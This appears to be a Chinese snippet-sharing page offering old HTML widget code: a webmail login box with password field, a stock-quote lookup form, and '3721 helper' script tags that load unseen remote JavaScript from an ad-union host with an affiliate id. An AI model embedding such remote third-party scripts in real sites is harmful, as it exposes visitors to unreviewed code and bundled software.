<CENTER><SELECT name=site size=1 tabIndex=2> <OPTION selected value="">请选择邮箱</OPTION> <OPTION value=126.com>@126.com网易50M</OPTION> <OPTION value=21cn.com>@21cn.com</OPTION> <OPTION value=163.net>@163.net</OPTION> <OPTION value=tom.com>@tom.com</OPTION> <OPTION value=163.com>@163.com</OPTION> <OPTION value=vip.163.com>@vip.163.com</OPTION> <OPTION value=sohu.com>@sohu.com</OPTION> <OPTION value=263.net>@263.net</OPTION> <OPTION value=sina.com>@sina.com</OPTION> <OPTION value=vip.sina.com>@vip.sina.com</OPTION> <OPTION value=mail.china.com>@mail.china.com</OPTION> <OPTION value=china.com>@china.com</OPTION> <OPTION value=netease.com>@netease.com</OPTION> <OPTION value=yeah.net>@yeah.net</OPTION> <OPTION value=etang.com>@etang.com</OPTION> <OPTION value=fm365.com>@fm365.com</OPTION> <OPTION value=cn.yahoo.com>@yahoo.com.cn</OPTION> <OPTION value=xinhuanet.com>@xinhuanet.com</OPTION> <OPTION value=eyou.com>@eyou.com</OPTION> <OPTION value=email.com.cn>@email.com.cn</OPTION> <OPTION value=ynmail.com>@ynmail.com</OPTION> <OPTION value=citiz.net>@citiz.net</OPTION> <OPTION value=elong.com>@elong.com</OPTION></SELECT></CENTER>账号:<INPUT name=user size=12 style="FONT-SIZE: 12px" tabIndex=3>密码:<INPUT name=pass size=12 style="FONT-SIZE: 12px" tabIndex=3 type=password><INPUT name=Submit2 onclick="setTimeout('clearpass()',1000)" style="FONT-SIZE: 13px" tabIndex=4 type=submit value=登录> <A href="http://ad./ebar.asp?user=cdc460&jump=0&url=http://reg.126.com/regconfirm.htm" target=_blank>申请免费邮箱</A> </TR></TBODY></TABLE></FORM>

股市行情代码

<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD align=left width="100%"></TD></TR></TBODY></TABLE>
<TABLE bgColor=#ffffff border=0 cellPadding=3 cellSpacing=1 class=tabBlackBorder4 width=160>
<TBODY>
<TR>
<TD bgColor=#ffffcf height=2></TD></TR>
<TR>
<TD align=middle>
<TABLE align=center bgColor=#eed9ee border=0 cellPadding=0 cellSpacing=0 width="100%">
<FORM action=http://bjap1.cn.tom.com/app/cntom/stock/stock.php target=_blank>
<TBODY>
<TR>
<TD><IFRAME border=0 frameBorder=no height=130 marginHeight=0 marginWidth=0 scrolling=no src="http://finance.tom.com/script/hq_sh.html" width=150></IFRAME></TD></TR>
<TR>
<TD><SELECT class=input name=sw> <OPTION selected value=3>沪深</OPTION> <OPTION value=7>B 股</OPTION> <OPTION value=5>美国</OPTION> <OPTION value=4>香港</OPTION></SELECT> <INPUT name=word size=7 style="FONT-SIZE: 12px"> <INPUT border=0 name=submit style="FONT-SIZE: 12px" type=submit value=查询></TD></TR></FORM><A href="http://www./mrzs.htm">
<MARQUEE><FONT color=red>每日A股综述 </FONT></MARQUEE></A></TBODY></TABLE></TD></TR></TBODY></TABLE>
<STYLE type=text/css>  .spanstyle {   position:absolute;   visibility:visible; top:-50px;   font-size:9pt;  color: #FF8080;  font-weight:bold;  }</STYLE>
<BR>
<SCRIPT language=JavaScript1.2></SCRIPT>

3721上网助手代码

 

<script language="JavaScript" type="text/JavaScript" src="http://union./ass/adv1_8.js?pid2=U_jshqy_45053"></script>
<script language="JavaScript" type="text/JavaScript" src="http://union./ass/adv2_8.js?pid2=U_jshqy_45053"></script>
<script language="JavaScript" type="text/JavaScript" src="http://union./ads/ads.js?id=39198&ads=1&img_url=http%3A%2F%2Funion.%2Fimages%2FIM135-100.swf&img_type=1&img_h=100&img_w=135"> </script>



  

 



 


 









    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约